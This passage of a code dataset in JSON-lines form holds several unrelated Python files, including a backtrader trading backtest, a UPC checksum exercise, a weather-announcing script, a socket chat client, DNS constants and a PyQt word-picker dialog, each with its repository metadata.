new_mesh[j][0:i]=='8' and flag==0:\n flag=1\n #print('I am in flag')\n temp=new_mesh[j]\n k=j\n #print('I am in flag',k)\n break\n\n if flag==1: \n #print('I am in flag=1') \n if new_mesh[j][0:i]=='4' or new_mesh[j][0:i]=='5':\n #print('I found 4/5',k)\n new_mesh[k]=new_mesh[j]\n new_mesh[j]=temp\n k=j\n #temp = new_mesh[k]\n break\n break\n i=i+1 \n\nfor j in range(element_num, element_num+20):\n print(new_mesh[j])\n#print('adfsdf=',len(new_mesh))\n# print(new_mesh[i])\n","sub_path":"normal_vec.py","file_name":"normal_vec.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"292787061","text":"from __future__ import(absolute_import,division,print_function,unicode_literals)\nimport backtrader as bt \nfrom strategy import MovingAverage\nfrom strategy import chart_detection\nfrom positionsize import examplesizer\nfrom positionsize import maxRiskSizer\nimport datetime as dt\nfrom commision import CommNifty\n# from analyzers import printTradeAnalysis,printSQN\nimport json\n# \n\n\ndatapath=\"E:/Backtesting pandas/Data/Nifty-1D.csv\"\n# datapath=\"F:/Zerodha data/BankNifty futures continuous\\Bankniftyfutures1.csv\"\n\nif __name__==\"__main__\":\n\tcerebro=bt.Cerebro()\n\tcommission = CommNifty(commission=0.03,mult=75,margin=100000)\n\tcerebro.addstrategy(chart_detection)\n\tdata=bt.feeds.GenericCSVData(\n\tdataname=datapath,\n\tfromdate=dt.datetime(2008,1,1),\n\ttodate=dt.datetime(2018,1,1),\n\tdatetime=0,\n\ttimeframe=bt.TimeFrame.Days,\n\tcompression=1,\n\tdtformat=(\"%Y-%m-%d\"),\n\topen=1,\n\thigh=2,\n\tlow=3,\n\tclose=4,\n\topeninterest=-1, \n\tvolume=-1,\n\treverse=False,\n\theader=0\n\t\t)\n\t\n\t\ncerebro.adddata(data)\ncerebro.addsizer(bt.sizers.FixedSize,stake=1)\n# 
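The parameter-shift rule used in the gradient code above is exact, not a finite-difference approximation: for rotation gates like RX the expectation value is sinusoidal in the parameter, so [f(w+s) - f(w-s)] / (2 sin s) recovers the derivative for any shift s. A quick sanity check with a cosine stand-in for the circuit:

import numpy as np

f = lambda w: np.cos(w)      # stand-in for a circuit expectation value
w, s = 0.3, np.pi / 2
grad = (f(w + s) - f(w - s)) / (2 * np.sin(s))
print(np.isclose(grad, -np.sin(w)))  # True: exact, independent of s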
cerebro.addsizer(maxRiskSizer,risk=0.05)\ncerebro.broker.setcash(500000.00)\n# cerebro.broker.setcommission(commission=20.0, margin=100000.0, mult=50.0)\ncerebro.broker.addcommissioninfo(commission)\n\n\n\ncerebro.addanalyzer(bt.analyzers.TradeAnalyzer, _name=\"ta\")\ncerebro.addanalyzer(bt.analyzers.SQN, _name=\"sqn\")\ncerebro.addanalyzer(bt.analyzers.Calmar,_name=\"Calmar\")\ncerebro.addanalyzer(bt.analyzers.SharpeRatio,_name=\"Sharpe\")\ncerebro.addanalyzer(bt.analyzers.DrawDown,_name=\"drawdown\")\ncerebro.addanalyzer(bt.analyzers.AnnualReturn,_name=\"annualreturn\")\ncerebro.addanalyzer(bt.analyzers.Returns,_name=\"return\")\ncerebro.addanalyzer(bt.analyzers.VWR,_name=\"vwr\")\ncerebro.addanalyzer(bt.analyzers.TimeDrawDown,_name=\"timedrawdown\")\ncerebro.addanalyzer(bt.analyzers.PyFolio,_name=\"portfolio\")\n\ncerebro.addobserver(bt.observers.Trades)\ncerebro.addobserver(bt.observers.DrawDown)\ncerebro.addobserver(bt.observers.BuySell)\n# cerebro.addwriter(bt.WriterFile,csv=True,out=\"Output/data.csv\")\n\n\n\n\n\nprint(\"Starting portfolio value :\",cerebro.broker.getvalue())\nstrategies = cerebro.run()\n# cerebro.plot()\n\n# positions, transactions, gross_lev = strategies[0].analyzers.pyfolio.get_pf_items()\n# pf.create_round_trip_tear_sheet(returns, positions, transactions)\n# firstStrat = strategies[0]\n# printTradeAnalysis(firstStrat.analyzers.ta.get_analysis())\n# printSQN(firstStrat.analyzers.sqn.get_analysis())\nprint(\"Final portfolio value :\",cerebro.broker.getvalue())\n# cerebro.plot(style='candlestick')\n\n# annualreturnanalyzer = open(r\"Output/annualreturnanalayzer.txt\",\"w+\")\n# drawdownanalyzer = open(r\"Output/drawndownanalayzer.txt\",\"w+\")\n# sharperatioanalyzer = open(r\"Output/sharperatioanalayzer.txt\",\"w+\")\n# vwranalyzer = open(r\"Output/vwranalayzer.txt\",\"w+\")\n# returnanalyzer = open(r\"Output/returnanalayzer.txt\",\"w+\")\n# tradeanalyzer = open(r\"Output/tradeanalayzer.txt\",\"w+\")\n# time_drawdown_analyzer=open(r\"Output/timedrawdownanalayzer.txt\",\"w+\")\n# sqn_analyzer=open(r\"Output/sqnanalayzer.txt\",\"w+\")\n\n# annualreturnanalyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"annualreturn\").get_analysis()))\n# drawdownanalyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"drawdown\").get_analysis()))\n# sharperatioanalyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"Sharpe\").get_analysis()))\n# vwranalyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"vwr\").get_analysis()))\n# returnanalyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"return\").get_analysis()))\n# tradeanalyzer.write(str(firstStrat.analyzers.getbyname(\"ta\").get_analysis()))\n# time_drawdown_analyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"timedrawdown\").get_analysis()))\n# sqn_analyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"sqn\").get_analysis()))\n\n# annualreturnanalyzer.close()\n# drawdownanalyzer.close()\n# sharperatioanalyzer.close()\n# vwranalyzer.close()\n# returnanalyzer.close()\n# tradeanalyzer.close() \n# time_drawdown_analyzer.close()\n# sqn_analyzer.close()\n\n\n\n\n\n","sub_path":"Moving_avg_futures/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"438482101","text":"#!/usr/bin/env python3\n\n\"\"\"\n Perform a checksum on a UPC\n\n Assignment 1, Exercise 2, INF1340 Fall 2014\n\"\"\"\n\n__author__ = 'Susan Sim'\n__email__ = \"ses@drsusansim.org\"\n\n__copyright__ = \"2014 Susan 
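The commented-out maxRiskSizer is imported but its implementation is not shown in this file; a plausible sketch using backtrader's documented Sizer._getsizing hook (the risk logic below is an assumption, not the project's actual code):

import backtrader as bt

class MaxRiskSizer(bt.Sizer):
    params = (('risk', 0.05),)

    def _getsizing(self, comminfo, cash, data, isbuy):
        if isbuy:
            # Commit at most `risk` of available cash at the current close.
            return int((cash * self.p.risk) / data.close[0])
        # When selling, close out whatever position is currently held.
        return self.broker.getposition(data).size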
Sim\"\n__license__ = \"MIT License\"\n\n__status__ = \"Prototype\"\n\n# imports one per line\n\n\ndef checksum(upc):\n \"\"\"\n Checks if the digits in a UPC is consistent with checksum\n\n :param upc: a 12-digit universal product code\n :return:\n Boolean: True, checksum is correct\n False, otherwise\n :raises:\n TypeError if input is not a string\n ValueError if string is the wrong length (with error string stating how many digits are over or under\n\n Step 1: Find the sum of the digits in the odd positions then multiply the sum by 3\n Step 2: Find the sum of the digits in the even position (not including the 12th digit)\n Add the sum of the even position digits to Step 1\n Step 3: Take the result of Step 2, and find the remainder when divided by 10\n\n If Step 3 is equal to zero, check to see if the 12th digit of the upc is zero\n If Step 3 = 0 and the 12th digit = 0, then return True\n Else, False\n If Step 3 is not equal to zero, subtract it from 10\n Take this result and check to see if it is equal to the 12th digit of the upc\n If 10 - Step = 12th digit, then return True\n Else, return False\n \"\"\"\n if type(upc) is str:\n # Checking if upc is a string\n print(\"string\")\n else:\n # If not a string, raise TypeError\n raise TypeError(\"upc is not a string\")\n\n if len(upc) == 12:\n # Checking the number of digits in upc\n print(\"12\")\n else:\n # If upc is not 12 digits, raise ValueError\n if len(upc) > 12:\n # If upc is not 12 digits, calculate how many digits are over or under 12\n print(\"upc is\", (len(upc) - 12), \"digits more than 12\")\n else:\n print(\"upc is\", (12 - len(upc)), \"digits less than 12\")\n raise ValueError(\"Error because upc must be 12 digits\")\n\n list(upc)\n # Separate the digits of the upc into an array\n print(list(upc))\n\n upc = [int(i) for i in upc]\n # Convert each digit of upc into an integer so we can do math\n print(upc[1])\n\n step_1 = sum(upc[::2]) * 3\n # Add every other digit starting with the first digit\n # Then multiply that by 3\n print(step_1)\n\n step_2 = sum(upc[1::2]) - upc[11] + step_1\n # Add every other digit starting with the second digit, but exclude the last digit\n # Add that to the result of step_1\n\n # Find the remainder when divided by 10\n step_3 = step_2 % 10\n\n # Check to see if step_3 is equal to 0\n # If step_3 is not equal to 0, subtract step_3 from 10\n if step_3 == 0:\n last_digit = 0\n else:\n last_digit = 10 - step_3\n\n # Check to see if calculations is equal to the last digit of the upc\n # If calculations is equal to the last digit of the upc, then it is a valid upc\n # If calculations do not equal the last digit of the upc, then it is not a valid upc\n if last_digit == upc[11]:\n return True\n else:\n return False\n\n\n\n\n\n","sub_path":"exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"31558555","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('products', '0019_auto_20170420_1213'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='policy',\n name='required_documents_application',\n field=models.CharField(max_length=200, null=True, blank=True),\n ),\n migrations.AddField(\n model_name='policy',\n name='required_documents_claim',\n field=models.CharField(max_length=200, null=True, blank=True),\n ),\n 
]\n","sub_path":"mango/products/migrations/0020_auto_20170420_1222.py","file_name":"0020_auto_20170420_1222.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"258824738","text":"def build(bld):\n bld.stlib(\n source = [\n 'classifier.cpp',\n 'recommender.cpp',\n 'weight_manager.cpp',\n ],\n target = 'jubatus_dump'\n )\n\n def make_test(src):\n bld.program(\n features = 'gtest',\n target = src[0: src.find('.')],\n source = src,\n use = 'jubatus_dump JUBATUS',\n )\n\n make_test('types_test.cpp')\n make_test('classifier_test.cpp')\n","sub_path":"src/jubatus/dump/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"12418404","text":"import requests\nimport pyttsx3 as pyttsx\ndef getWeather():\n apiKey='0f4b173c7a1997bf7c8ab1984d5ebe63&q'\n zCode = '08837'\n api_address='http://api.openweathermap.org/data/2.5/weather?zip={},us&appid=0f4b173c7a1997bf7c8ab1984d5ebe63&q='.format(zCode)\n url = api_address\n json_data = requests.get(url).json()\n weather = json_data[\"weather\"][0][\"description\"]\n main = json_data[\"main\"]\n minTemp = int((float(main[\"temp_min\"]) -273.15 ) * (9/5) + 32)\n maxTemp = int((float(main[\"temp_max\"]) -273.15) * (9/5) + 32)\n currTemp = int((float(main[\"temp\"]) -273.15) * (9/5) + 32)\n location = json_data[\"name\"]\n engine = pyttsx.init()\n outStr = \"Weather in {} is {} with a high of {}°F a low of {}°F and current temeperature of {}°F.\".format(location,weather,maxTemp,minTemp,currTemp)\n print(outStr)\n engine.say(outStr)\n engine.runAndWait()","sub_path":"Code/AI/bCast.py","file_name":"bCast.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"53002417","text":"\"\"\"\nФункции ​к​лиента:​\n- сформировать ​​presence-сообщение;\n- отправить ​с​ообщение ​с​ерверу;\n- получить ​​ответ ​с​ервера;\n- разобрать ​с​ообщение ​с​ервера;\n- параметры ​к​омандной ​с​троки ​с​крипта ​c​lient.py ​​ ​[​]:\n- addr ​-​ ​i​p-адрес ​с​ервера;\n- port ​-​ ​t​cp-порт ​​на ​с​ервере, ​​по ​у​молчанию ​​7777.\n\"\"\"\nimport sys\nimport time\nimport threading\nimport logging\nimport log.client_log_config\nfrom socket import socket, AF_INET, SOCK_STREAM\nfrom errors import UsernameToLongError, ResponseCodeLenError, MandatoryKeyError, ResponseCodeError\nfrom jim.config import *\nfrom jim.utils import send_message, get_message\nfrom log.decorators import Log\n\n# Получаем по имени клиентский логгер, он уже нестроен в client_log_config\nlogger = logging.getLogger('client')\nlog = Log(logger)\n\n\n# функция формирования сообщения\n@log\ndef create_presence(account_name=\"Guest\"):\n \"\"\"\n Сформировать ​​presence-сообщение\n :param account_name: Имя пользователя\n :return: Словарь сообщения\n \"\"\"\n # Если имя не строка\n if not isinstance(account_name, str):\n # Генерируем ошибку передан неверный тип\n raise TypeError\n # Если длина имени пользователя больше 25 символов\n if len(account_name) > 25:\n # генерируем нашу ошибку имя пользователя слишком длинное\n raise UsernameToLongError(account_name)\n # если все хорошо, то\n # формируем словарь сообщения\n message = {\n ACTION: PRESENCE,\n TIME: time.time(),\n USER: {\n ACCOUNT_NAME: account_name\n }\n }\n\n # возвращаем сообщение в виде словаря\n return message\n\n\n# функция разбора ответа сервера\n@log\ndef 
translate_message(response):\n \"\"\"\n Разбор сообщения\n :param response: Словарь ответа от сервера\n :return: корректный словарь ответа\n \"\"\"\n # Передали не словарь\n if not isinstance(response, dict):\n raise TypeError\n # Нету ключа response\n if RESPONSE not in response:\n # Ошибка нужен обязательный ключ\n raise MandatoryKeyError(RESPONSE)\n # если все хорошо, то\n # получаем код ответа\n code = response[RESPONSE]\n # длина кода не 3 символа\n if len(str(code)) != 3:\n # Ошибка неверная длина кода ошибки\n raise ResponseCodeLenError(code)\n # неправильные коды символов\n if code not in RESPONSE_CODES:\n # ошибка неверный код ответа\n raise ResponseCodeError(code)\n\n # возвращаем ответ\n return response\n\n\ndef read_messages(client, account_name):\n \"\"\"\n Клиент читает входящие сообщения в бесконечном цикле\n :param client: сокет клиента\n \"\"\"\n while True:\n # читаем сообщение\n message = get_message(client)\n print(message['message'])\n\n\ndef create_message(message_to, text, account_name='Guest'):\n return {ACTION: MSG, TIME: time.time(), TO: message_to, FROM: account_name, MESSAGE: text}\n\n\n# ЗАПУСКАЕМ КЛИЕНТА!!!\nif __name__ == '__main__':\n # Создать TCP-сокет клиента\n client = socket(AF_INET, SOCK_STREAM) # Создать сокет TCP\n # Пытаемся получить параметры скрипта\n # Получаем аргументы скрипта\n #------------ip-адрес-----------#\n # если ip-адрес указан в параметрах -p \n try:\n addr = sys.argv[1]\n # если ip-адрес не указан в параметрах\n except IndexError:\n addr = 'localhost'\n #--------------порт-------------#\n # если порт указан в параметрах\n try:\n port = int(sys.argv[2])\n # если порт не указан в параметрах\n except IndexError:\n port = 7777\n # если порт - не целое число\n except ValueError:\n print('Порт должен быть целым числом')\n sys.exit(0)\n try:\n account_name = 'yyy'\n # account_name = sys.argv[3]\n print(account_name)\n except IndexError:\n print('Укажите получателя')\n #sys.exit(0)\n #print(sys.argv)\n # ДАННЫЕ ПОЛУЧИЛИ -> СОЕДИНЯЕМСЯ С СЕРВЕРОМ\n # Соединиться с сервером\n client.connect((addr, port))\n # Сформировать сообщение серверу\n #account_name = 'Console0'\n presence = create_presence(account_name)\n # Отправить сообщение серверу\n send_message(client, presence)\n # Получить ответ сервера\n response = get_message(client)\n # Разобрать ответ сервера\n response = translate_message(response)\n #print(response)\n if response['response'] == OK:\n t = threading.Thread(target=read_messages, args=(client, account_name))\n t.start()\n\n while True:\n message_str = input(':) >')\n if message_str.startswith('message'):\n params = message_str.split()\n try:\n to = params[1]\n text = ' '.join(params[2:])\n except IndexError:\n print('Не задан получатель или текст сообщения')\n else:\n message = create_message(to, text, account_name)\n send_message(client, message)\n\n elif message_str == 'help':\n print('message <получатель> <текст> - отправить сообщение')\n elif message_str == 'exit':\n break\n else:\n print('Неверная команда, для справки введите help')\n\n client.disconnect()\n","sub_path":"EX_8/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"54055680","text":"class Solution(object):\n\n def detectCapitalUse(self, word):\n \"\"\"\n Given a word, you need to judge whether the usage of capitals in it is right or not.\n\n We define the usage of capitals in a word to be right when one of the following cases holds:\n\n 
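For reference, create_presence('Guest') above produces a dict of roughly this shape. The exact key strings live in jim.config, which is not shown, so the values below assume the conventional JIM constants:

# {'action': 'presence',
#  'time': 1618033988.75,             # time.time() at call time
#  'user': {'account_name': 'Guest'}}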
All letters in this word are capitals, like \"USA\".\n All letters in this word are not capitals, like \"leetcode\".\n Only the first letter in this word is capital, like \"Google\".\n Otherwise, we define that this word doesn't use capitals in a right way.\n\n Note: The input will be a non-empty word consisting of uppercase and lowercase latin letters.\n\n Runtime: 32 ms, faster than 36.82% of Python3 online submissions for Detect Capital.\n Memory Usage: 12.7 MB, less than 100.00% of Python3 online submissions for Detect Capital.\n\n\n Parameters\n ----------\n word : str\n\n\n Returns\n -------\n\n ret : bool\n\n\n Examples\n --------\n >>> Solution().detectCapitalUse(\"FlaG\")\n False\n\n >>> Solution().detectCapitalUse(\"USA\")\n True\n\n \"\"\"\n\n can_low = can_cap = True\n\n for idx in range(len(word)):\n if word[idx].isupper():\n if not can_cap:\n return False\n\n if idx > 0 and can_cap:\n can_low = False\n\n else:\n if not can_low:\n return False\n\n can_cap = False\n return True\n","sub_path":"algorithms/520_Detect_Capital.py","file_name":"520_Detect_Capital.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"537071419","text":"# -*- coding: utf-8 -*-\n\nfrom base import Map\n\nCLASS = Map({\n 1: 'IN',\n 3: 'CH',\n 4: 'HS',\n 254: 'NONE',\n 255: 'ANY'\n})\nQR = Map({\n 0: 'QUERY',\n 1: 'RESPONSE'\n})\n\nOPCODE = Map({\n 0: 'QUERY',\n 1: 'IQUERY',\n 2: 'STATUS',\n 4: 'NOTIFY',\n 5: 'UPDATE'\n})\n\nRCODE = Map({\n 0: 'NOERROR',\n 1: 'FORMERR',\n 2: 'SERVFAIL',\n 3: 'NXDOMAIN',\n 4: 'NOTIMP',\n 5: 'REFUSED',\n 6: 'YXDOMAIN',\n 7: 'YXRRSET',\n 8: 'NXRRSET',\n 9: 'NOTAUTH',\n 10: 'NOTZONE'\n})\n\nTYPE = Map({\n 1: 'A',\n 2: 'NS',\n 5: 'CNAME',\n 6: 'SOA',\n 28: 'AAAA',\n 41: 'OPT',\n 255: 'ANY',\n})\n","sub_path":"const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"139474627","text":"\n\nfrom PyQt5.QtWidgets import (QWidget, QPushButton,\n QMenu, QAction, QDialog,\n QTableView, QHeaderView, QLineEdit, QLabel, QFrame, QVBoxLayout, QHBoxLayout, QComboBox)\nfrom PyQt5.QtGui import QIcon, QCursor\nfrom PyQt5.QtCore import Qt, QRegExp, QRect, QSize, QPoint, QItemSelectionModel\n\n# import utilities as Utilities\n\nfrom sortBeautifulWordsFilterProxyModel import SortBeautifulWordsFilterProxyModel\nimport globals\nimport logging\n\n\nDIALOG_WIDTH = 1000\nDIALOG_HEIGHT = 700\nIMAGE_WIDTH = DIALOG_WIDTH\nIMAGE_HEIGHT = 103\nCOLUMN_TO_FILTER = 0\nSPACER_SIZE = 20\n\n\nclass BeautifulWordSelectorDialog(QDialog):\n def __init__(self, title, classifications, parent=None,):\n QDialog.__init__(self, parent)\n self.parent = parent\n self._selectedWord = \"\"\n self.classifications = classifications\n\n self.lastStart = 0\n self.title = title\n self.proxyModel = SortBeautifulWordsFilterProxyModel(self)\n # This property holds whether the proxy model is dynamically sorted and filtered whenever the contents of the source model change\n self.proxyModel.setDynamicSortFilter(True)\n self.sourceView = QTableView() # where we store the unfiltered list\n self.tableView = QTableView()\n self.selectedWord = None\n self.tableView.setAlternatingRowColors(True)\n self.tableView.setModel(self.proxyModel)\n self.tableView.setSortingEnabled(True)\n self.setWindowTitle(title)\n self.tableView.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n 
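The three accepted capitalization patterns map directly onto Python's built-in string predicates, so the flag-tracking loop above can be replaced by a one-liner:

def detect_capital_use(word):
    # "USA", "leetcode", and "Google" styles are the only valid forms.
    return word.isupper() or word.islower() or word.istitle()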
self.tableView.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\n self.tableView.horizontalHeader().setDefaultAlignment(Qt.AlignLeft)\n self.tableView.setAlternatingRowColors(True)\n self.tableView.setSortingEnabled(True)\n self.tableView.verticalHeader().hide()\n self.tableView.setSelectionMode(QTableView.SingleSelection)\n self.tableView.setSelectionBehavior(QTableView.SelectItems)\n self.tableView.clicked.connect(self.selectItem)\n # selectionModel = self.tableView.selectionModel()\n # selectionModel.selectionChanged.connect(self.selectionChanged)\n\n self.filterString = \"\"\n self.filterColumn = 0\n self.resetFilterEnables()\n self.initUI()\n\n def resetFilterEnables(self):\n self.wordFilterEnabled = False\n self.meaningFilterEnabled = False\n self.tagFilterEnabled = False\n self.classificationFilterEnabled = False\n\n def clearFilters(self):\n logging.debug(\"Clearing the filters\")\n self.wordFilter.setText(\"\")\n self.meaningFilter.setText(\"\")\n self.classificationFilter.setCurrentIndex(0)\n self.tagFilter.setText(\"\")\n\n def AddClearFiltersButton(self):\n self.clearFiltersButton = QPushButton('', self)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.clearFiltersButton.setStyleSheet(\"QPushButton { color: rgb(255, 255, 255);\\n\"\n \"background-color: rgb(0, 0, 0); }\\n\"\n \"QPushButton:pressed { color: rgb(255, 255, 255);\\n\"\n \"background-color: rgb(47,79,79); }\\n\"\n \"QPushButton { border: none; }\")\n self.clearFiltersButton.clicked.connect(self.clearFilters)\n self.clearFiltersButton.setIcon(\n QIcon(\":/images/images/clearAll.png\"))\n self.clearFiltersButton.setIconSize(QSize(32, 32))\n self.headerLayout.addWidget(self.clearFiltersButton)\n\n def createHeader(self):\n self.headerLayout = QHBoxLayout()\n self.headerLayout.setObjectName(\"self.headerLayout\")\n self.headerLayout.setContentsMargins(10, 10, 10, 10)\n self.headerFrame = QFrame(self.horizontalLayoutWidget)\n self.headerFrame.setMinimumSize(QSize(DIALOG_WIDTH-20, IMAGE_HEIGHT))\n self.headerFrame.setMaximumSize(QSize(DIALOG_WIDTH-20, IMAGE_HEIGHT))\n self.headerFrame.setBaseSize(QSize(0, 0))\n self.headerFrame.setAutoFillBackground(False)\n self.headerFrame.setObjectName(\"HeaderBackgroundImage\")\n self.headerFrame.setStyleSheet(\n \"QFrame#HeaderBackgroundImage { background-repeat:no-repeat; background-position: left; background-image: url(:/images/images/WomanReadingHeader.png); }\")\n self.headerFrame.setFrameShape(QFrame.StyledPanel)\n self.headerFrame.setFrameShadow(QFrame.Raised)\n self.headerFrame.setLayout(self.headerLayout)\n self.headerSpacerWidget = QWidget(self.headerFrame)\n self.headerSpacerWidget.setObjectName(\"headerSpacerWidget\")\n self.headerSpacerWidget.setGeometry(\n QRect(0, 0, SPACER_SIZE, SPACER_SIZE))\n self.headerSpacerWidget.setObjectName(\"headerSpacerWidget\")\n self.wordFilter = QLineEdit(self.headerFrame)\n self.wordFilterLabel = QLabel(\" Word Filter\", self.headerFrame)\n self.wordFilterLabel.setBuddy(self.wordFilter)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.wordFilter.setStyleSheet(\"color: rgb(0, 0, 0);\\n\"\n \"background-color: rgb(255, 255, 255);\")\n self.wordFilterLabel.setStyleSheet(\n \"QLabel { color: rgb(255, 255, 255); font-weight:600 }\")\n self.wordFilterLabel.setObjectName(\"wordFilterLabel\")\n self.headerLayout.addStretch()\n self.headerLayout.addWidget(self.headerSpacerWidget)\n self.headerLayout.addWidget(self.wordFilterLabel)\n self.headerLayout.addWidget(self.wordFilter)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n 
self.wordFilter.setStyleSheet(\n \"background-color: #FFFFFF; padding:1px 1px 1px 1px\")\n self.wordFilter.setFixedWidth(120)\n\n self.wordFilter.textChanged.connect(self.setWordFilter)\n self.wordFilter.setToolTip(\n \"Enter a starting letter or letters to find words\")\n self.meaningFilterLabel = QLabel(\" Meaning Filter\", self.headerFrame)\n self.meaningFilter = QLineEdit(self.headerFrame)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.meaningFilter.setStyleSheet(\"color: rgb(0, 0, 0);\\n\"\n \"background-color: rgb(255, 255, 255);\")\n self.meaningFilterLabel.setBuddy(self.meaningFilter)\n self.meaningFilterLabel.setStyleSheet(\n \"QLabel { color: rgb(255, 255, 255); font-weight:600 }\")\n self.headerLayout.addWidget(self.meaningFilterLabel)\n self.headerLayout.addWidget(self.meaningFilter)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.meaningFilter.setStyleSheet(\n \"background-color: #FFFFFF; padding:1px 1px 1px 1px\")\n self.meaningFilter.setFixedWidth(120)\n self.meaningFilter.textChanged.connect(self.setMeaningFilter)\n self.meaningFilter.setToolTip(\n \"Enter a meaning for which you would like to find a word\")\n self.tagFilterLabel = QLabel(\" Tag Filter\", self.headerFrame)\n self.tagFilter = QLineEdit(self.headerFrame)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.tagFilter.setStyleSheet(\"color: rgb(0, 0, 0);\\n\"\n \"background-color: rgb(255, 255, 255);\")\n self.tagFilterLabel.setBuddy(self.tagFilter)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.tagFilterLabel.setStyleSheet(\n \"QLabel { color: rgb(255, 255, 255); font-weight:600 }\")\n self.headerLayout.addWidget(self.tagFilterLabel)\n self.headerLayout.addWidget(self.tagFilter)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.tagFilter.setStyleSheet(\n \"background-color: #FFFFFF; padding:1px 1px 1px 1px\")\n self.tagFilter.setFixedWidth(120)\n self.tagFilter.textChanged.connect(self.setTagFilter)\n self.tagFilter.setToolTip(\n \"Enter a word you like like to find synonyms for\")\n # These classifications need to move into a file that is generated from processing the word list; they should not be hard coded\n self.classificationFilterLabel = QLabel(\n \" Classification Filter\", self.headerFrame)\n self.classificationFilter = QComboBox(self.headerFrame)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.classificationFilter.setStyleSheet(\"color: rgb(0, 0, 0);\\n\"\n \"background-color: rgb(255, 255, 255); padding:1px 1px 1px 1px;\")\n self.classificationFilter.addItems(self.classifications)\n self.classificationFilterValue = self.classifications[0]\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.classificationFilterLabel.setStyleSheet(\n\n \"QLabel { color: rgb(255, 255, 255); font-weight:600 }\")\n self.tagFilterLabel.setStyleSheet(\n \"QLabel { color: rgb(255, 255, 255); font-weight:600 }\")\n self.classificationFilterLabel.setBuddy(self.classificationFilter)\n self.headerLayout.addWidget(self.classificationFilterLabel)\n self.headerLayout.addWidget(self.classificationFilter)\n self.AddClearFiltersButton()\n self.headerLayout.addStretch()\n\n self.classificationFilter.setFixedWidth(120)\n self.classificationFilter.currentTextChanged.connect(\n self.setClassificationFilter)\n self.classificationFilter.setToolTip(\n \"Select a Classification for which you would like to find words\")\n\n def initUI(self):\n mainLayout = QVBoxLayout()\n self.horizontalLayoutWidget = QWidget(self)\n self.horizontalLayoutWidget.setGeometry(\n QRect(0, 0, DIALOG_WIDTH, IMAGE_HEIGHT))\n self.createHeader()\n self.acceptButton = 
QPushButton(\"Insert Selected Word\", self)\n self.acceptButton.setToolTip(\n 'Insert the selected word into your document')\n self.acceptButton.clicked.connect(\n lambda: self.acceptSelection(self.selectedWord))\n self.acceptButton.setEnabled(False)\n mainLayout.addWidget(self.headerFrame)\n mainLayout.addWidget(self.tableView)\n mainLayout.addWidget(self.acceptButton)\n self.setGeometry(300, 300, DIALOG_WIDTH, DIALOG_HEIGHT)\n self.setFixedSize(DIALOG_WIDTH, DIALOG_HEIGHT)\n self.setWindowTitle(self.title)\n self.setLayout(mainLayout)\n\n def selectItem(self, index):\n mapped_index = self.proxyModel.mapToSource(index)\n model = mapped_index.model()\n row = mapped_index.row()\n column = mapped_index.column()\n standardItem = model.item(row, 0)\n modelIndex = standardItem.index()\n self.selectedWord = modelIndex.data(0)\n self.acceptButton.setEnabled(True)\n selectionModel = self.tableView.selectionModel()\n # newIndex = self.tableView.model().index(row, 0)\n # selectionModel.select(newIndex, QItemSelectionModel.ClearAndSelect)\n # self.selectionMenu = QMenu(self)\n # icon = QIcon(\":/images/images/clipboard-paste-document-text.png\")\n # selectionAction = self.selectionMenu.addAction(icon,\n # 'Click {} to insert this word into your document'.format(\"here\"))\n\n # selectionAction.triggered.connect(lambda: self.acceptSelection(data))\n # x = QCursor.pos().x()\n # y = QCursor.pos().y()\n # newPosition = QPoint(x+5, y+5)\n # self.selectionMenu.exec_(newPosition)\n\n def acceptSelection(self, data):\n if(data):\n self.selectedWord = data\n self.accept()\n\n def setWordFilter(self):\n text = self.wordFilter.text()\n if((text is not None) and (not text.isspace()) and (text != \"\")):\n self.filterString = \"^\" + text\n self.wordFilterPattern = repr(\n self.filterString)[1:-1]\n self.filterColumn = 0\n self.wordFilterEnabled = True\n self.filterRegExpChanged()\n else:\n self.wordFilterEnabled = False\n self.filterString = \"\"\n self.wordFilterPattern = repr(\n self.filterString)[1:-1]\n self.filterRegExpChanged()\n\n def setMeaningFilter(self):\n text = self.meaningFilter.text()\n if((text is not None) and (not 